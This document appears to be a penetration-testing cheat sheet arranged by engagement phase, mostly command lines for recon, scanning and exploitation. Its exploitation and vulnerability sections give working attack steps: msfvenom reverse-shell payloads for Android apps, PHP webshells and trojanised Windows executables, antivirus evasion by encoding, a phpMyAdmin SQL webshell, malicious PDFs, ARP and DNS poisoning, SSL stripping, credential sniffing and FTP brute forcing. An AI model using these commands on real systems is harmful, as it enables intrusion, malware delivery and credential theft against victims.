1.

Pre-engagement

###############################################################################
2. Information Gathering

**OSINT**

InSpy
--How to Use it?
1. inspy "Company Name" --empspy /usr/share/inspy/wordlists/title-list-large.txt

Recon-ng
Search for additional subdomain
1. use recon/hosts/gather/http/web/google_site
2. set DOMAIN cryptors.org
3. run
Search for XSS
1. use recon/hosts/enum/http/web/xssed

-NETCRAFT
--How to use it?
---1. Go to www.netcraft.com
---2. Enter the target website
--What does it do?
---1. Provide publicly available info about the target such as
----1. Hosting Provider
----2. Domain Provider
----3. Web Server
----4. Uptime Logs
----5. Queries about Softwares they are Using

-WHOIS LOOKUPS
--How to use it?
---1. Open terminal and type: whois targetWebsite.com
--What does it do?
---1. Provide information about the website owner including contact info
---2. Provide our hosting and domain provider information

-DNS Reconnaissance
dnsenum cryptors.org
host -t ns cryptors.org
host -t mx cryptors.org

--NSLOOKUP
---How to use it #1?
----1. Open terminal and type: nslookup www.target.com
---What does it do?
----1. It will return the IP address of the target and website name
---How to use it #2?
----1. nslookup
----2. set type=mx
----3. target.com
---What does it do?
----1. It will return the mail servers of the target

--HOST
---How to use it?
----1. host -t ns target.com
---What does it do?
----1. Give us the name servers for the target

--ZONE TRANSFER
---How to use it?
----1. host -l domainToTransfer.com nameServer.com
---What does it do?
----1. It can transfer the DNS records for a domain

-Searching For Email Addresses

--THEHARVESTER
---How to use it?
----1. theharvester -d target.com -b google
---What does it do?
----1. It will list down all emails available in the target website and it's
subdomains

-MALTEGO
--How to use it?
---1. Search for Maltego App in Kali Linux
---2. Select Domain Target
---3. RUn Transforms based on your needs
--What does it do?
---1. Provide us DNS infos
---2. Provide us list of Emails in the company
---3. Provide us list of Phone numbers in the company
---4. Provide us list of available files in the company
---5. Gives us an illustrative and graphical view of the company

**PORT SCANNING**

-MANUAL PORT SCANNING

--NETCAT
---How to use it?
----1. nc -vv 192.168.0.10 21
---What does it do?
----1. -vv means it will verbose the details of each process
----2. 192.168.0.10 is your target IP address
----3. 21 is the port number of your target

-PORT SCANNING WITH NMAP

--NMAP SYN Scan

---How to use it?
----1. nmap -sS 192.168.20.10-12 -oA filename
---What does it do?
----1. -sS stands for SYN Scan and it will state the open ports
----2. -oA creates a file which contains the results
----3. It also gives us which types of services is available in the target
----4. This scan is stealthy and quiet.

--NMAP Version Scan

---How to use it?
----1. nmap -sV 192.168.20.10-12 -oA filename
---What does it do?
----1. It provides us the versions of each software running on each ports

--NMAP UDP Scan

---How to use it?
----1. nmap -sU 192.168.20.10-12 -oA filename
---What does it do?
----1. We are scanning the target "connectionless"
----2. If receives a response then it is open
----3. If receives an ICMP Port Unreachable message then it is closed
----4. If does not respond, it has a huge chance that it is filtered, otherwise it
is open but just don't listen to Nmap's query

--Scanning a Specific Port

--How to use it?
---1. nmap -sS -p 3232 192.168.20.10
--What does it do?
---1. It will syn scan the 3232 port only
---2. You can change the -sS to -sV to version scan the port 3232
---3. You can change the 3232 to whatever port you want to scan

###############################################################################

3. Threat Modeling

###############################################################################

4. Vulnerability Analysis

-NIKTO
--How to use it?
---1. nikto -h websiteOrIpAddressOfTarget
--What does it do?
---1. It scans the website for possible vulnerabilities

-CADAVER
--How to use it?
---1. Check if the target website has webdav. By entering in the browser
http://website/webdav
---2. Webdav is allows client to perform remote web content operation such as to
create, change and move documents on a server
---3. If there is "WebDav Test Page" in the webdav page then you can use cadaver
---4. cadaver http://192.168.100.117/webdav
---5. It will now give you a user and pass prompt. The default username and pass is
wampp:xampp
--What does it do?
---1. It will give you an access to the server where you can do much pretty
everything.

WIRESHARK
--How to use it?
---1. Click Capture and choose a Driver (eth0, wlan0)
---2. Uncheck Promiscuous Mode then Start
---3. Do some FTP connection to the target
---4. Filter the connection to the wireshark by inputting "ftp" in the filter box
---5. We can also use ip.dst==192.168.100.117 to return only packets from this
destination IP
---6. We can also combine this commands by && command
ip.dst==192.168.100.117 && ftp
---7. We can see the user and pass by digging deeper using Follow TCP Stream
----1.Right click the start of transaction
----2. Click Follow
----3. Click TCP Stream
----4. It will give you details such as the user and pass

ARP
--How to use it?
---1. Just type: arp
--What does it do?
---1. It allows us to view the arp cache in your machine

View the ARP Broadcast

--1. Restart WireShark capture and use the anonymous login to interact with the
Ubuntu Target's FTP server again
--2. Use the arp filter to see the ARP broadcast from the Kali machine and the
reply from the Ubuntu with its Mac Address
--3. You can arp again in your terminal to see that it adds the Ubuntu target's arp
cache

IP Forwarding
--1. THIS IS NEEDED BEFORE CONDUCTING ARP CACHE POISONING
--2. echo 1 > /proc/sys/net/ipv4/ip_forward

ARP Cache Poisoning with Arpspoof

--1. Type: arp -a (To note the original MAC Addresses in Arp Cache before the
poisoning)
--2. Type: arpspoof -i wlan0 -t 192.168.0.105 192.168.0.106
--3. Type: arpspoof -i wlan0 -t 192.168.0.106 192.168.0.105
--4. Type: arp -a (AGAIN. For you to see that their MAC Address was changed to
yours)
--5. You can use wireshark to see the exchange of data (Using FTP Connection from
Linux to XP)

ARP Cache Poisoning to Impersonate the Default Gateway

--1. Type: arpspoof -i wlan0 -t 192.168.0.105 192.168.0.1
--2. Type: arpspoof -i wlan0 -t 192.168.0.1 192.168.0.105
--3. Try to Google "Alexis Pogi" using the target's browser
--4. Use WireShark with http filter: You can see the query "Alexis Pogi"

DNS Cache Poisoning

--1. apache2 service start
--2. cat hosts.txt (192.168.1.9 www.gmail.com)
--3. dnspoof -i wlan0 -f hosts.txt
--4. nslookup www.gmail.com

Using ETTERCAP for SSL MITM

--1. ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.9//
--2. ettercap is the tool for MITM
--3. -Ti is Text-based interface
--4. -M arp:remote /default gateway// /target// to setup an ARP cache poisoning
attack between the default gateway and the target
--5. Open facebook.com to the target OS and login
--6. View your terminal and search for "PASS" then you can see the login user and
pass

SSL Stripping
--1. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-
port 8080
--2. sslstrip -l 8080
--3. ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.9//

###############################################################################
5. Exploitation

-Hacking Android Phone Using Metasploit

--How to use it?
---1. Create a payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=yourIp LPORT=unusedPort R >
name.apk
---2. Open Metasploit
msfconsole
---3. Use multi handler exploit
use multi/handler
---4. Use the same setting for your payload
set payload android/meterpreter/reverse_tcp
set LHOST yourIp
set LPORT unusedPort
---5. Execute the exploit
exploit
---6. Share the apk file to the target and let them download and open it.
(This will be useful only if you are in the same network)
--What does it do?
---1. It owns the android phone of the target

CADAVER
--1. cadaver http://192.168.1.4/webdav
--2. wampp:xampp username and pass
--3. put test.txt (To upload file)
--4. put test.php (To upload scripts)

Uploading meterpreter PHP Payload in WebDav

--1. Create the payload using msfvenom
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=2323 -f raw >
meterpreter.php
--2. login to Cadaver again
--3. put meterpreter.php (Uploading the mterpreter.php)
--4. Open Metasploit
--5. use multi/handler
--6. set payload php/meterpreter/reverse_tcp
--7. set LHOST 192.168.1.19 && set LPORT 2323
--8. exploit (It will start to listen)
--9. Open the meterpreter.php in the browser by going to
http://192.168.1.4/webdav/meterpreter.php
--10. A session will be opened.

Exploiting Open phpMyAdmin

--1. Go to http://192.168.1.4/phpmyadmin
--2. Click the SQL tab
--3. Enter this:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
--4. It must have an error because there is no specified cmd command
--5. Add in the url:
?cmd=ipconfig

Creating Wordlist Using CRUNCH

--1.crunch 3 3 abc -o crunch.txt

Online Password Cracking with HYDRA

--1. Create a password list in passwordfile.txt
--2. hydra -l georgia -P passwordfile.txt 192.168.1.4 ftp

Bypassing Filterssss

Try All Ports in METASPLOIT

--1. use exploit/windows/smb/ms08_067_netapi
--2. set payload windows/shell/reverse_tcp_allports
--3. exploit -j

Exploiting PDF using METASPLOIT

--1. use exploit/windows/fileformat/adobe_utilprintf
--2. exploit
--3. cp /root/.msf4/local/msf.pdf /var/www/html
--4. service apache2 start
--5. use multi/handler
--6. set payload windows/meterpreter/reverse_tcp
--7. set LHOST 192.168.1.19
--8. exploit
--9. Wait until the msf.pdf was opened on the target

Embed Executable inside a PDF using METASPLOIT

--1. use exploit/windows/fileformat/adobe_pdf_embedded_exe
--2. set INFILENAME /usr/share/set/readme/User_Manual.pdf
--3. set payload windows/meterpreter/reverse_tcp
--4. set LHOST 192.168.1.19
--5. exploit
--6. use multi/handler
--7. set payload windows/meterpreter/reverse_tcp
--8. exploit
--9. service apache2 start
--10. cp /root/.msf4/local/evil.pdf /var/www/html
--11. Wait until the evil.pdf was opened on the target

SOCIAL ENGINEERING TOOLKIT (Email Attacks and Web Attacks)

--1. setoolkit

Installing TROJAN using METASPLOIT

--1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=2345
-x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
--2. msfconsole
--3. use multi/handler
--4. set payload windows/meterpreter/reverse_tcp
--5. set LHOST and LPORT then exploit
--6. Execute the radmin.exe on the target to have meterpreter access

Bypassing Antivirus using ENCODERS in MSFVENOM

--1. msfvenom -l encoders
--2. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9
LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe
--3. Upload to virustotal to check (It must detect it because shikataganai cannot
do it alone)
--4. Combine shikata_ga_nai and x86/bloxor

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9

LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw > meterpreterencoded.bin

msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor

-i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin

--5. Try it also in our radmin.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9
LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai
-i 10 -f exe > radminencoded.exe

##############################################
6. Post Exploitation
7. Reporting